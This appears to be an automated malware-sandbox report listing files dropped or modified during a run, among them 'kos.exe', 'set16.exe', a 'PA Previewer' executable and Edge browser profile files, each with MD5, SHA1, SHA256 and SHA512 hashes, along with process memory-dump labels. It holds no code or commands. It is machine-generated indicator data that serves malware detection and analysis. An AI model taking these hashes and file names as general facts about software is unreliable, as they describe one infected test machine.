SHA512 aa62a8cd02a03e4f462f76ae6ff2e43849052ce77cca3a2ccf593f6669425830d0910afac3cf2c46dd385454a6fb3b4bd604ae13b9586087d6f22de644f9dfc7

memory/3312-500-0x000001CD7B530000-0x000001CD7B586000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 d8d26ec251e7f46977e2e0e058b541dc
SHA1 b6030cb4f7919c7076b4ad472c60658933adb17e
SHA256 29a872b5182c46cf63005bf2d9203732104f2033a134e051944428a1ddcc0bf7
SHA512 4823881d75cdd5224a1cfff487b077cab1ecee4e147a803f4e3c7cd22acd1d6fd5ffa0aaf9d6f7fdb9ce21d015953abee9fdcada9cef4b2bb5eea004ab9b1007

memory/3384-512-0x0000000007060000-0x0000000007070000-memory.dmp

memory/2016-513-0x0000000000400000-0x0000000000413000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe59c876.TMP

MD5 303ea8cb21b442840b4f025b42788acd
SHA1 f94448d623d8710c89693c0b498262932bbca2e8
SHA256 a6859b48df3d5485dfaa10f146998a8ffb2eb5a5e5f32d2f597804d6acd59950
SHA512 19d71170c94d273c2302c2c625f2e97534b8965bc22720ba13e863a2ae357a20f8bd39437d8f642f1d0a5079b719e0b34a638bd76fd8fe69829630c933e498d3

memory/5948-514-0x0000000000400000-0x00000000005F1000-memory.dmp

memory/5308-460-0x0000000000400000-0x00000000005F1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Program Files (x86)\PA Previewer\previewer.exe

MD5 27b85a95804a760da4dbee7ca800c9b4
SHA1 f03136226bf3dd38ba0aa3aad1127ccab380197c
SHA256 f98b98404ecf3871a10a290ade21ad77d0b2633f47247debc53d094b9bdff245
SHA512 e760a15370272aa9541f1afceaaf4f5a8068dad21c6a8d50ebd01514e16bbc8f867c8af349080f3d1fa7a19eafe7cde74921d01716dea69ef801da1b74eae4a7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 6c0245ca5a6198f46ea7a20e1f0bd2be
SHA1 7b3b3f734199be352242d649a501b5aaa073c093
SHA256 26f20e09f538a8eab45d9f0f05298dca6c187b61a05dd0e66fb11d3c34d4adaa
SHA512 34ee6892782f4fffe6161498c415dd9eccaed9671b134d6a6aa6f7bfd399ddf32a96247987693c9971b70a1f53a460cdbf054aa54cbe7deb6299fd8303de0541

memory/3036-369-0x00007FFDC4630000-0x00007FFDC50F1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-L4HBE.tmp\_isetup\_isdecmp.dll

MD5 b4786eb1e1a93633ad1b4c112514c893
SHA1 734750b771d0809c88508e4feb788d7701e6dada
SHA256 2ae4169f721beb389a661e6dbb18bc84ef38556af1f46807da9d87aec2a6f06f
SHA512 0882d2aa163ece22796f837111db0d55158098035005e57cd2e9b8d59dc2e582207840bf98bee534b81c368acf60ab5d8ecbe762209273bda067a215cdb2c0c6

C:\Users\Admin\AppData\Local\Temp\is-L4HBE.tmp\_isetup\_isdecmp.dll

MD5 b4786eb1e1a93633ad1b4c112514c893
SHA1 734750b771d0809c88508e4feb788d7701e6dada
SHA256 2ae4169f721beb389a661e6dbb18bc84ef38556af1f46807da9d87aec2a6f06f
SHA512 0882d2aa163ece22796f837111db0d55158098035005e57cd2e9b8d59dc2e582207840bf98bee534b81c368acf60ab5d8ecbe762209273bda067a215cdb2c0c6

C:\Users\Admin\AppData\Local\Temp\kos.exe

MD5 076ab7d1cc5150a5e9f8745cc5f5fb6c
SHA1 7b40783a27a38106e2cc91414f2bc4d8b484c578
SHA256 d1b71081d7ba414b589338329f278ba51c6ccf542d74f131f96c2337ee0a4c90
SHA512 75e274a654e88feb0d66156f387bc5e420811f4f62939396a7455d12e835d7e134b2579ab59976c591b416d1ec1acdf05e9eb290c8f01383c6a50bf43854420b

C:\Users\Admin\AppData\Local\Temp\kos.exe

MD5 076ab7d1cc5150a5e9f8745cc5f5fb6c
SHA1 7b40783a27a38106e2cc91414f2bc4d8b484c578
SHA256 d1b71081d7ba414b589338329f278ba51c6ccf542d74f131f96c2337ee0a4c90
SHA512 75e274a654e88feb0d66156f387bc5e420811f4f62939396a7455d12e835d7e134b2579ab59976c591b416d1ec1acdf05e9eb290c8f01383c6a50bf43854420b

memory/2016-314-0x0000000000400000-0x0000000000413000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\set16.exe

MD5 22d5269955f256a444bd902847b04a3b
SHA1 41a83de3273270c3bd5b2bd6528bdc95766aa268
SHA256 ab16986253bd187e3134f27495ef0db4b648f769721bc8c84b708c7ba69156fd
SHA512 d85ada5d8c2c02932a79241a484b088ba70bda0497fd8ad638300935a16841d7cbc8258be93055907cb533bc534fdd48c7c91109fa22f87e65a6b374cd51055c

memory/3252-311-0x0000000000400000-0x0000000000469000-memory.dmp

memory/3384-308-0x0000000007150000-0x000000000715A000-memory.dmp

memory/3384-280-0x0000000007090000-0x0000000007122000-memory.dmp

memory/3472-525-0x0000000000400000-0x00000000004B0000-memory.dmp

memory/3384-527-0x0000000008A20000-0x0000000008A96000-memory.dmp

memory/3744-528-0x00007FFDC4630000-0x00007FFDC50F1000-memory.dmp

memory/3384-529-0x0000000008AA0000-0x0000000008ABE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 3d8f4eadb68a3e3d1bf2fa3006af5510
SHA1 d5d8239ec8a3bf5dadf52360350251d90d9e0142
SHA256 85a80218f4e5b578993436a6b8066b60508dd85a09579a4cb6757c2f9550d96c
SHA512 554773c4edd8456efaa23ac24970af5441e307424de3d2f41539c2cf854d57e7f725bf0c9986347fd3f2ff43efc8f69fd73c5d773bbfd504a99daca2b272a554

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 adf1f0f820920072fd02e6bd1bb46fae
SHA1 e67844f08a5682712410e015f68407ee2ae69245
SHA256 8756adb744b4d1fcfe164e40c99f208cd8a1f5ddfd0263808e48d7f5ac8d7b5a
SHA512 0776fbed8dd8dd376bd4827249c054df59c38a7104ddea8bcd5d3da42b6f61cea5f4d45650946727917efd6254f0f00d246b6abf55a9342304f98bf4dab45ccf

memory/3384-565-0x0000000008CE0000-0x0000000008EA2000-memory.dmp

memory/3384-566-0x00000000093E0000-0x000000000990C000-memory.dmp

memory/3744-569-0x000000001ADD0000-0x000000001ADE0000-memory.dmp

memory/3472-570-0x0000000000530000-0x0000000000531000-memory.dmp

memory/3312-572-0x000001CD62BE0000-0x000001CD62BF0000-memory.dmp

memory/3312-571-0x00007FFDC4630000-0x00007FFDC50F1000-memory.dmp

memory/3744-577-0x00007FFDC4630000-0x00007FFDC50F1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 1604bfc8cf2a7bb375cdbe80063dd20a
SHA1 36fa180b7d4b87a8b99c2f0ba4473f55d887bd07
SHA256 cc9d195222a76e3941bc1140664d2fb069128eb3facd69e411268ee480e229f9
SHA512 ae7ae8c4870b1e051593491cbd8cce7a0613cfc6235f78cab4dfb32e58d1a302e8763b8dfbd3ae1283a54718bea9aea738dd9d4000f202465fa657ab2563f10d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 16e38f86db35e3b5b117be42905b5e6a
SHA1 0e2c7daa03eeffbc2f411ad0ddf3cbe8a2b79e8a
SHA256 d36173d4d8800640c0d0fd409bae6d5d6e5216374c8a7689bd4bcad4f5342a71
SHA512 b949199d3ef3c0ad1b00f37e5ac5694c72ab49180502eaea8ac53ead486a1ea664b288702e4584b682222749d79d6d7da43273fa0668282d97f4ac3a99f6e390

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 01c070bfdf2e411241754ca68a1643e3
SHA1 a718a8dd9e4d5404ad1048377bb0eb77d6a7fdd7
SHA256 fff153ff92c38b3a1765531af58751b809617bb5d878dde8df084493616da352
SHA512 56a898c3f9921dbc6e1ba563b1c8b1de120246f02a49afa7957ab9d3bc2d60ef805190d8815ca278f4cf31a033804beb5e80c67d9a3f65df99d3ab3c93ba9d9e

memory/5948-633-0x0000000000400000-0x00000000005F1000-memory.dmp

memory/208-667-0x0000000140000000-0x00000001407CF000-memory.dmp

memory/208-668-0x0000000140000000-0x00000001407CF000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 aefd77f47fb84fae5ea194496b44c67a
SHA1 dcfbb6a5b8d05662c4858664f81693bb7f803b82
SHA256 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
SHA512 b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

memory/208-677-0x0000000140000000-0x00000001407CF000-memory.dmp

memory/208-678-0x000002777D8A0000-0x000002777D8C0000-memory.dmp

memory/208-680-0x0000000140000000-0x00000001407CF000-memory.dmp

memory/208-681-0x0000000140000000-0x00000001407CF000-memory.dmp

memory/208-682-0x0000000140000000-0x00000001407CF000-memory.dmp

memory/208-683-0x0000000140000000-0x00000001407CF000-memory.dmp

memory/208-684-0x0000000140000000-0x00000001407CF000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 9bfc31dbd8fcf94bb75a3c1ec72ce5d7
SHA1 d969b688efd5d02bc515f5c0d5ee6462e7304af5
SHA256 00603079de0d42196c41f25e5fcd316c115f355f65f322bb76ddfee2eee8771e
SHA512 5a35ce9d6fe288b670dd3e96a749ce76fd203726a75833b7c1b3584c1db7a6f2fe7547090900932f8b2e67593127096daed4b77753b819f2b3bdc74006fc981b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 ad75017aa7e2d641ffa1349a8c4162bd
SHA1 5a6dbd2f38a535763f61f238695e6b312a4f9194
SHA256 3775d5d0a37dac16b53a44a782777a72e8e27368f718b92f51c6a583171d0aeb
SHA512 edc62cf089ec51dd6edfc65a8396b2ccf60a2362794b2297b3ff8f6bc14fca5b2de7a31633aa82f82e181a67377fd8c91e96b6bb099523eb3ef7965d17161a9e

memory/5948-714-0x0000000000400000-0x00000000005F1000-memory.dmp